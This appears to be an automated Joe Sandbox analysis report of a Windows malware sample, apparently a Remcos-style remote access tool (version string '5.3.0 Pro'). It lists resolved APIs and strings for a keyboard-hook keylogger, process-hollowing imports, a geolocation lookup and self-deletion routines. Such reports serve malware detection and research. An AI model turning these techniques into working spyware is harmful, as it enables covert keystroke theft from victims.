59613 c3b60 28 API calls 59613->59614 59614->59605 59614->59608 59614->59609 59614->59610 59614->59611 59614->59613 59615->59521 59616->59603 59618 c1fbd 28 API calls 59617->59618 59619 d4bbd SetEvent 59618->59619 59620 d4bd2 59619->59620 59621 c3b60 28 API calls 59620->59621 59622 d4bec 59621->59622 59623 c1fbd 28 API calls 59622->59623 59624 d4bfc 59623->59624 59625 c1fbd 28 API calls 59624->59625 59626 d4c0e 59625->59626 59627 dafc3 28 API calls 59626->59627 59628 d4c17 59627->59628 59629 d4c37 GetTickCount 59628->59629 59630 d4d99 59628->59630 59693 d4d8a 59628->59693 59632 dad46 28 API calls 59629->59632 59630->59693 59694 d4dad 59630->59694 59631 c1d8c 26 API calls 59633 d61fb 59631->59633 59634 d4c4d 59632->59634 59636 c1eea 26 API calls 59633->59636 59637 daca0 GetTickCount 59634->59637 59638 d6207 59636->59638 59639 d4c54 
59637->59639 59640 c1eea 26 API calls 59638->59640 59641 dad46 28 API calls 59639->59641 59642 d6213 59640->59642 59643 d4c5f 59641->59643 59644 dac52 30 API calls 59643->59644 59645 d4c6d 59644->59645 59696 daec8 59645->59696 59648 c1d64 28 API calls 59649 d4c89 59648->59649 59650 c27ec 28 API calls 59649->59650 59651 d4c97 59650->59651 59700 c275c 59651->59700 59653 d4ca6 59654 c27cb 28 API calls 59653->59654 59655 d4cb5 59654->59655 59656 c275c 28 API calls 59655->59656 59657 d4cc4 59656->59657 59658 c27cb 28 API calls 59657->59658 59659 d4cd0 59658->59659 59660 c275c 28 API calls 59659->59660 59661 d4cda 59660->59661 59662 c4468 60 API calls 59661->59662 59663 d4ce9 59662->59663 59664 c1eea 26 API calls 59663->59664 59665 d4cf2 59664->59665 59666 c1eea 26 API calls 59665->59666 59667 d4cfe 59666->59667 59668 c1eea 26 API calls 59667->59668 59669 d4d0a 59668->59669 59670 c1eea 26 API calls 59669->59670 59671 d4d16 59670->59671 59672 c1eea 26 API calls 59671->59672 59673 d4d22 59672->59673 59674 c1eea 26 API calls 59673->59674 59675 d4d2e 59674->59675 59676 c1e13 26 API calls 59675->59676 59677 d4d3a 59676->59677 59678 c1eea 26 API calls 59677->59678 59679 d4d43 59678->59679 59680 c1eea 26 API calls 59679->59680 59681 d4d4c 59680->59681 59682 c1d64 28 API calls 59681->59682 59683 d4d57 59682->59683 59684 fa5e7 _strftime 42 API calls 59683->59684 59685 d4d64 59684->59685 59686 d4d8f 59685->59686 59687 d4d69 59685->59687 59688 c1d64 28 API calls 59686->59688 59689 d4d77 59687->59689 59690 d4d82 59687->59690 59688->59630 59707 c49ba 81 API calls 59689->59707 59691 c4915 104 API calls 59690->59691 59691->59693 59693->59631 59708 c4ab1 83 API calls 59694->59708 59695 d4d7d 59695->59693 59697 daed5 59696->59697 59698 c1f86 28 API calls 59697->59698 59699 d4c7b 59698->59699 59699->59648 59701 c276b 59700->59701 59702 c27ad 59701->59702 59705 c27a2 59701->59705 59703 c1e9b 28 API calls 59702->59703 59704 c27ab 59703->59704 59704->59653 59709 c2ee5 28 API calls 
59705->59709 59707->59695 59708->59695 59709->59704 59711->58942 59712->58970 59713->58969 59714->58958 59715->58964 59716->58968 59721 ce56a 59717->59721 59718 d24b7 3 API calls 59718->59721 59719 ce60e 59723 c82dc 28 API calls 59719->59723 59720 c82dc 28 API calls 59727 ce5a1 59720->59727 59721->59718 59721->59719 59722 ce5fe Sleep 59721->59722 59721->59727 59750 cbf04 59721->59750 59722->59721 59726 ce619 59723->59726 59725 dae08 28 API calls 59725->59727 59728 dae08 28 API calls 59726->59728 59727->59720 59727->59722 59727->59725 59733 c1e13 26 API calls 59727->59733 59735 c1f66 28 API calls 59727->59735 59739 d26d2 29 API calls 59727->59739 59837 d2774 29 API calls 59727->59837 59730 ce625 59728->59730 59838 d2774 29 API calls 59730->59838 59732 ce638 59734 c1e13 26 API calls 59732->59734 59733->59727 59736 ce644 59734->59736 59735->59727 59737 c1f66 28 API calls 59736->59737 59738 ce655 59737->59738 59740 d26d2 29 API calls 59738->59740 59739->59727 59741 ce668 59740->59741 59839 d1699 TerminateProcess WaitForSingleObject 59741->59839 59743 ce670 ExitProcess 59912 d1637 61 API calls 59745->59912 59840 d1699 TerminateProcess WaitForSingleObject 59750->59840 59752 cbf13 59753 cbf26 59752->59753 59841 cafba TerminateThread 59752->59841 59755 cbf36 59753->59755 59862 d8c08 9 API calls 59753->59862 59757 cbf3f 59755->59757 59759 cbf50 59755->59759 59863 db42f 9 API calls 59757->59863 59760 cbf76 59759->59760 59761 d297a 2 API calls 59759->59761 59762 d297a 2 API calls 59760->59762 59763 cbf95 59760->59763 59761->59760 59762->59763 59764 d297a 2 API calls 59763->59764 59765 cbfb2 ___scrt_fastfail 59763->59765 59764->59765 59766 d265d 3 API calls 59765->59766 59767 cc002 59766->59767 59768 cc019 59767->59768 59769 cc009 GetModuleFileNameW 59767->59769 59770 cc020 RegDeleteKeyA 59768->59770 59769->59768 59771 cc03f 59770->59771 59772 cc058 SetFileAttributesW 59771->59772 59773 cc049 59771->59773 59848 dab38 59772->59848 59775 cc055 SetFileAttributesW 59773->59775 
59775->59772 59777 dae08 28 API calls 59778 cc086 59777->59778 59779 c28cf 28 API calls 59778->59779 59780 cc094 59779->59780 59781 c1e13 26 API calls 59780->59781 59782 cc09e 59781->59782 59783 c1eea 26 API calls 59782->59783 59784 cc0a7 59783->59784 59785 c3b40 28 API calls 59784->59785 59786 cc0c9 59785->59786 59787 c28cf 28 API calls 59786->59787 59788 cc0d4 59787->59788 59859 c3cdc 59788->59859 59790 cc0e0 59791 c1e13 26 API calls 59790->59791 59792 cc0ea 59791->59792 59793 c1e13 26 API calls 59792->59793 59794 cc0f3 59793->59794 59795 c3b40 28 API calls 59794->59795 59796 cc101 59795->59796 59797 c3cbb 28 API calls 59796->59797 59798 cc110 59797->59798 59799 c1e13 26 API calls 59798->59799 59800 cc11a 59799->59800 59801 cc176 59800->59801 59803 c3b40 28 API calls 59800->59803 59802 c3b40 28 API calls 59801->59802 59805 cc191 59802->59805 59804 cc135 59803->59804 59806 c3cbb 28 API calls 59804->59806 59807 c28cf 28 API calls 59805->59807 59809 cc144 59806->59809 59808 cc19c 59807->59808 59810 c28cf 28 API calls 59808->59810 59811 c28cf 28 API calls 59809->59811 59812 cc1a8 59810->59812 59813 cc150 59811->59813 59814 c1e13 26 API calls 59812->59814 59815 c1e13 26 API calls 59813->59815 59816 cc1bc 59814->59816 59817 cc164 59815->59817 59818 c1e13 26 API calls 59816->59818 59819 c1e13 26 API calls 59817->59819 59820 cc1c5 59818->59820 59821 cc16d 59819->59821 59822 c1e13 26 API calls 59820->59822 59823 c1e13 26 API calls 59821->59823 59824 cc1ce 59822->59824 59823->59801 59829 cc22f 59824->59829 59864 cb0dd 28 API calls 59824->59864 59826 cc206 59827 c28cf 28 API calls 59826->59827 59828 cc212 59827->59828 59830 c1e13 26 API calls 59828->59830 59832 db58f 4 API calls 59829->59832 59831 cc226 59830->59831 59833 c1e13 26 API calls 59831->59833 59834 cc267 59832->59834 59833->59829 59835 cc286 ExitProcess 59834->59835 59836 cc279 ShellExecuteW 59834->59836 59836->59835 59837->59727 59838->59732 59839->59743 59840->59752 59842 caf77 59841->59842 59843 cafd3 
UnhookWindowsHookEx TerminateThread 59841->59843 59844 caf83 DeleteFileW 59842->59844 59843->59842 59846 caf9f 59844->59846 59845 cafb5 59845->59753 59846->59845 59847 cafae RemoveDirectoryW 59846->59847 59847->59845 59849 dab48 59848->59849 59865 da45a 59849->59865 59855 cc07b 59855->59777 59856 100a1a 38 API calls 59858 dab7f 59856->59858 59858->59855 59858->59856 59874 dc188 28 API calls 59858->59874 59908 c2daf 59859->59908 59861 c3cea 59861->59790 59862->59755 59863->59759 59864->59826 59866 f95ba 27 API calls 59865->59866 59867 da461 GetCurrentProcessId 59866->59867 59868 100a3b 59867->59868 59875 106ebf GetLastError 59868->59875 59870 dab73 59871 100a1a 59870->59871 59872 106ebf pre_c_initialization 38 API calls 59871->59872 59873 100a1f 59872->59873 59873->59858 59874->59858 59876 106ee1 59875->59876 59877 106ed5 59875->59877 59897 108706 20 API calls 3 library calls 59876->59897 59896 107466 11 API calls 2 library calls 59877->59896 59880 106edb 59880->59876 59882 106f2a SetLastError 59880->59882 59881 106eed 59883 106ef5 59881->59883 59904 1074bc 11 API calls 2 library calls 59881->59904 59882->59870 59898 106ac5 59883->59898 59885 106f0a 59885->59883 59887 106f11 59885->59887 59905 106d31 20 API calls _free 59887->59905 59888 106efb 59889 106f36 SetLastError 59888->59889 59906 1053b6 38 API calls _abort 59889->59906 59891 106f1c 59893 106ac5 _free 20 API calls 59891->59893 59895 106f23 59893->59895 59895->59882 59895->59889 59896->59880 59897->59881 59899 106ad0 RtlFreeHeap 59898->59899 59903 106af9 _free 59898->59903 59900 106ae5 59899->59900 59899->59903 59907 105354 20 API calls _free 59900->59907 59902 106aeb GetLastError 59902->59903 59903->59888 59904->59885 59905->59891 59907->59902 59909 c2dbb 59908->59909 59910 c30f7 28 API calls 59909->59910 59911 c2dcd 59910->59911 59911->59861 59913 fa998 59916 fa9a4 _swprintf __FrameHandler3::FrameUnwindToState 59913->59916 59914 fa9b2 59931 105354 20 API calls _free 59914->59931 59916->59914 59919 fa9dc 
59916->59919 59917 fa9b7 59932 fa827 26 API calls _Deallocate 59917->59932 59926 104acc EnterCriticalSection 59919->59926 59921 fa9e7 59927 faa88 59921->59927 59924 fa9c2 __wsopen_s 59926->59921 59929 faa96 59927->59929 59928 fa9f2 59933 faa0f LeaveCriticalSection std::_Lockit::~_Lockit 59928->59933 59929->59928 59934 108416 39 API calls 2 library calls 59929->59934 59931->59917 59932->59924 59933->59924 59934->59929 59935 d4dba 59950 da51b 59935->59950 59937 d4dc3 59938 c1fbd 28 API calls 59937->59938 59939 d4dd2 59938->59939 59940 c4468 60 API calls 59939->59940 59941 d4dde 59940->59941 59942 d61f2 59941->59942 59943 c1eea 26 API calls 59941->59943 59944 c1d8c 26 API calls 59942->59944 59943->59942 59945 d61fb 59944->59945 59946 c1eea 26 API calls 59945->59946 59947 d6207 59946->59947 59948 c1eea 26 API calls 59947->59948 59949 d6213 59948->59949 59951 da529 59950->59951 59952 fa88c ___crtLCMapStringA 21 API calls 59951->59952 59953 da533 InternetOpenW InternetOpenUrlW 59952->59953 59954 da55c InternetReadFile 59953->59954 59957 da57f 59954->59957 59955 c1f86 28 API calls 59955->59957 59956 da5ac InternetCloseHandle InternetCloseHandle 59958 da5be 59956->59958 59957->59954 59957->59955 59957->59956 59959 c1eea 26 API calls 59957->59959 59958->59937 59959->59957 59960 c99d0 59963 c9a97 59960->59963 59962 c99e1 59964 c9ab4 59963->59964 59965 c9af7 CallNextHookEx 59963->59965 59966 c9abf 59964->59966 59967 c9ae0 59964->59967 59965->59962 59968 c9ac4 59966->59968 59969 c9ad2 59966->59969 59976 ca931 59967->59976 59968->59965 60033 cad56 38 API calls 59968->60033 60034 cadb0 30 API calls 59969->60034 59972 c9ad0 59972->59965 59977 ca940 59976->59977 59978 c1f66 28 API calls 59977->59978 59979 c9aec 59977->59979 59980 cabcd 59978->59980 59979->59965 59982 cabfd 59979->59982 60035 c9d33 29 API calls 59980->60035 59983 cac17 59982->59983 59984 cad40 59982->59984 59985 cac1d 59983->59985 59986 cac9b 59983->59986 60036 c9b10 59984->60036 59992 c1f66 28 API calls 
59985->59992 60027 cad3e 59985->60027 59989 c1f66 28 API calls 59986->59989 59991 caca9 59989->59991 59993 c1f66 28 API calls 59991->59993 59994 cac4a 59992->59994 59995 cacb7 59993->59995 60046 fe7eb 46 API calls 59994->60046 59997 dae08 28 API calls 59995->59997 59999 caccc 59997->59999 59998 cac53 60000 c1f66 28 API calls 59998->60000 60049 cae1e 31 API calls 59999->60049 60003 cac63 60000->60003 60002 cacda 60004 dae08 28 API calls 60002->60004 60047 c85fd 28 API calls 60003->60047 60006 cace8 60004->60006 60050 c2860 28 API calls 60006->60050 60007 cac6e 60008 c275c 28 API calls 60007->60008 60010 cac78 60008->60010 60048 c9d33 29 API calls 60010->60048 60011 cacf3 60051 c2860 28 API calls 60011->60051 60014 cac80 60016 c1eea 26 API calls 60014->60016 60015 cacfd 60052 c9d58 27 API calls 60015->60052 60018 cac89 60016->60018 60020 c1eea 26 API calls 60018->60020 60019 cad05 60021 c1e13 26 API calls 60019->60021 60022 cac92 60020->60022 60023 cad0e 60021->60023 60025 c1eea 26 API calls 60022->60025 60024 c1e13 26 API calls 60023->60024 60026 cad17 60024->60026 60025->60027 60028 c1e13 26 API calls 60026->60028 60027->59965 60029 cad20 60028->60029 60030 c1e13 26 API calls 60029->60030 60031 cad2c 60030->60031 60032 c1eea 26 API calls 60031->60032 60032->60022 60033->59972 60034->59972 60035->59979 60037 f6050 ___scrt_fastfail 60036->60037 60038 c9b31 6 API calls 60037->60038 60039 c9bf8 60038->60039 60042 c9b91 ___scrt_fastfail 60038->60042 60040 c9c08 ToUnicodeEx 60039->60040 60040->60040 60041 c9bef 60040->60041 60043 c3b40 28 API calls 60041->60043 60042->60041 60045 c9bc6 ToUnicodeEx 60042->60045 60044 c9c37 60043->60044 60053 c9d58 27 API calls 60044->60053 60045->60041 60046->59998 60047->60007 60048->60014 60049->60002 60050->60011 60051->60015 60052->60019 60053->60027

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,000CD783), ref: 000DBCF8
• GetProcAddress.KERNEL32(00000000), ref: 000DBD01
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,000CD783), ref: 000DBD18
• GetProcAddress.KERNEL32(00000000), ref: 000DBD1B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,000CD783), ref: 000DBD2D
• GetProcAddress.KERNEL32(00000000), ref: 000DBD30
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,000CD783), ref: 000DBD41
• GetProcAddress.KERNEL32(00000000), ref: 000DBD44
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,000CD783), ref: 000DBD55
• GetProcAddress.KERNEL32(00000000), ref: 000DBD58
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,000CD783), ref: 000DBD65
• GetProcAddress.KERNEL32(00000000), ref: 000DBD68
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,000CD783), ref: 000DBD75
• GetProcAddress.KERNEL32(00000000), ref: 000DBD78
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,000CD783), ref: 000DBD85
• GetProcAddress.KERNEL32(00000000), ref: 000DBD88
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,000CD783), ref: 000DBD99
• GetProcAddress.KERNEL32(00000000), ref: 000DBD9C
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,000CD783), ref: 000DBDA9
• GetProcAddress.KERNEL32(00000000), ref: 000DBDAC
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,000CD783), ref: 000DBDBD
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBDC0
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,000CD783), ref: 000DBDD1
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBDD4
                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,000CD783), ref: 000DBDE5
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBDE8
                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,000CD783), ref: 000DBDF5
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBDF8
                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,000CD783), ref: 000DBE06
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE09
                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,000CD783), ref: 000DBE16
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE19
                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,000CD783), ref: 000DBE2B
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE2E
                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,000CD783), ref: 000DBE3B
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE3E
                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,000CD783), ref: 000DBE50
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE53
                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,000CD783), ref: 000DBE60
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE63
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$HandleLibraryLoadModule
                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                              • API String ID: 384173800-625181639
                                              • Opcode ID: 1bbe12ad37947d2097d0e1cc8250cc63e9dc3093b4d67c3307cb33f98836a023
                                              • Instruction ID: 5160d92abca2dc4e6371a84568060d908a3f201288ff6429fe812456f4b0c8dd
                                              • Opcode Fuzzy Hash: 1bbe12ad37947d2097d0e1cc8250cc63e9dc3093b4d67c3307cb33f98836a023
                                              • Instruction Fuzzy Hash: B3310EA0E4833C7ADB207BB67D89C5BBF9CDB44B943020816B514D3695DB78E9508EA8

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000C9A01
                                              • SetWindowsHookExA.USER32(0000000D,000C99D0,00000000), ref: 000C9A0F
                                              • GetLastError.KERNEL32 ref: 000C9A1B
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 000C9A6B
                                              • TranslateMessage.USER32(?), ref: 000C9A7A
                                              • DispatchMessageA.USER32(?), ref: 000C9A85
                                              Strings
                                              • Keylogger initialization failure: error , xrefs: 000C9A32
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$CallbackDispatchDispatcherErrorHandleHookLastLocalModuleTimeTranslateUserWindows
                                              • String ID: Keylogger initialization failure: error
                                              • API String ID: 941179788-952744263
                                              • Opcode ID: 94ac9d52fc7590e60a4c318227c7d1406dc5e3fd7aebb3c7f29d3b5373c49f4a
                                              • Instruction ID: 6ef24012235586b8eaf9e75ad45f1fccd2cc31fad214a0f249e4c0fdc9b7825d
                                              • Opcode Fuzzy Hash: 94ac9d52fc7590e60a4c318227c7d1406dc5e3fd7aebb3c7f29d3b5373c49f4a
                                              • Instruction Fuzzy Hash: CF118F31614201ABC720AB799D4AEAFB7FCAB95710B00452EF855C2691EB30DA41C7A2

                                              Control-flow Graph

                                              APIs
                                              • GetForegroundWindow.USER32(?,?,001340F8), ref: 000C9B3F
                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 000C9B4B
                                              • GetKeyboardLayout.USER32(00000000), ref: 000C9B52
                                              • GetKeyState.USER32(00000010), ref: 000C9B5C
                                              • GetKeyboardState.USER32(?,?,001340F8), ref: 000C9B67
                                              • ToUnicodeEx.USER32(0013414C,?,?,?,00000010,00000000,00000000), ref: 000C9B8A
                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 000C9BE3
                                              • ToUnicodeEx.USER32(0013414C,?,?,?,00000010,00000000,00000000), ref: 000C9C1C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                              • String ID:
                                              • API String ID: 1888522110-0
                                              • Opcode ID: 6a40a4b952c0cac58917c1d15004477e94d992fea902d4898d50070eb4ede7b2
                                              • Instruction ID: 4c4c382217481aa77326d27cf531546c5a7bdbd2b6d96f99860b99170e50db9f
                                              • Opcode Fuzzy Hash: 6a40a4b952c0cac58917c1d15004477e94d992fea902d4898d50070eb4ede7b2
                                              • Instruction Fuzzy Hash: 24319272554308BFD710DF90DC89FDBB7EDFB48710F00482AB641D65A1E7B1A9889BA2

                                              Control-flow Graph

                                              APIs
                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000DA53E
                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 000DA554
                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 000DA56D
                                              • InternetCloseHandle.WININET(00000000), ref: 000DA5B3
                                              • InternetCloseHandle.WININET(00000000), ref: 000DA5B6
                                              Strings
                                              • http://geoplugin.net/json.gp, xrefs: 000DA54E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$FileRead
                                              • String ID: http://geoplugin.net/json.gp
                                              • API String ID: 3121278467-91888290
                                              • Opcode ID: 7eb5a8a1f5fb46059ed59372fc2668348bd7b0d7a2482f1432f5f834b94c3437
                                              • Instruction ID: f8811c7e64e3d09003dc3a37eb63ab8827c3161a286051d9ba60273a229fb77c
                                              • Opcode Fuzzy Hash: 7eb5a8a1f5fb46059ed59372fc2668348bd7b0d7a2482f1432f5f834b94c3437
                                              • Instruction Fuzzy Hash: 4711C1712093226BD228AB25AC45EFF7FECEF86360F00053DF90592682CB549849C6B2

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 000D24B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 000D24D7
                                                • Part of subcall function 000D24B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,001342F8), ref: 000D24F5
                                                • Part of subcall function 000D24B7: RegCloseKey.KERNEL32(?), ref: 000D2500
                                              • Sleep.KERNEL32(00000BB8), ref: 000CE603
                                              • ExitProcess.KERNEL32 ref: 000CE672
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                              • String ID: 5.3.0 Pro$override$pth_unenc
                                              • API String ID: 2281282204-531312966
                                              • Opcode ID: ae9f5c6abb370942d0b0ab00d9ca59a5e3e42c335395fdc8d0ee15c891e9fe38
                                              • Instruction ID: 541cabf0c023ec20f07fde73aecaf5a88950cf1440b7c6a157567f2bbcf5cfdc
                                              • Opcode Fuzzy Hash: ae9f5c6abb370942d0b0ab00d9ca59a5e3e42c335395fdc8d0ee15c891e9fe38
                                              • Instruction Fuzzy Hash: 1321D032B0435067D6187B79A91BFEF3AAA9B92714F80401DF805973C7EE65CA1183E7
                                              APIs
                                              • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00134358), ref: 000DA7BF
                                              • GetUserNameW.ADVAPI32(?,000CDFC3), ref: 000DA7D7
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Name$ComputerUser
                                              • String ID:
                                              • API String ID: 4229901323-0
                                              • Opcode ID: dd485898407b737f094cbac73ffd2d3db8805d523e1c01f5b5b45779b633eb8e
                                              • Instruction ID: ebd3bfa906449274f3f3c2bab12a0a31cdc10880f5ba7aef1af3186223cb481f
                                              • Opcode Fuzzy Hash: dd485898407b737f094cbac73ffd2d3db8805d523e1c01f5b5b45779b633eb8e
                                              • Instruction Fuzzy Hash: 8801FB7290011CABDB14EB90DC45EDDB7BCAF44314F10416AB402F2196EFB0AB898BA4
                                              APIs
                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,000D45AD,00133EE8,00134A10,00133EE8,00000000,00133EE8,?,00133EE8,5.3.0 Pro), ref: 000CE68D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID:
                                              • API String ID: 2299586839-0
                                              • Opcode ID: 1d1a2b0a75d561032471fe5bc9b5de4897cf56f9424089968727b0e272401bb6
                                              • Instruction ID: 3b9ac085c6a81a00b24acf9b4e9019af85110884cfe45db3ca5321bde3193e88
                                              • Opcode Fuzzy Hash: 1d1a2b0a75d561032471fe5bc9b5de4897cf56f9424089968727b0e272401bb6
                                              • Instruction Fuzzy Hash: DDD05E70700218BBEA149381CD0AFDE7AACE702B61F000165BA01D72C1E9A0AF0086E1

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,000CD783), ref: 000DBCF8
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD01
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,000CD783), ref: 000DBD18
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD1B
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,000CD783), ref: 000DBD2D
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD30
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,000CD783), ref: 000DBD41
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD44
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,000CD783), ref: 000DBD55
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD58
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,000CD783), ref: 000DBD65
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD68
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,000CD783), ref: 000DBD75
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD78
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,000CD783), ref: 000DBD85
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD88
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,000CD783), ref: 000DBD99
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD9C
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,000CD783), ref: 000DBDA9
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBDAC
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,000CD783), ref: 000DBDBD
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBDC0
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,000CD783), ref: 000DBDD1
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBDD4
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,000CD783), ref: 000DBDE5
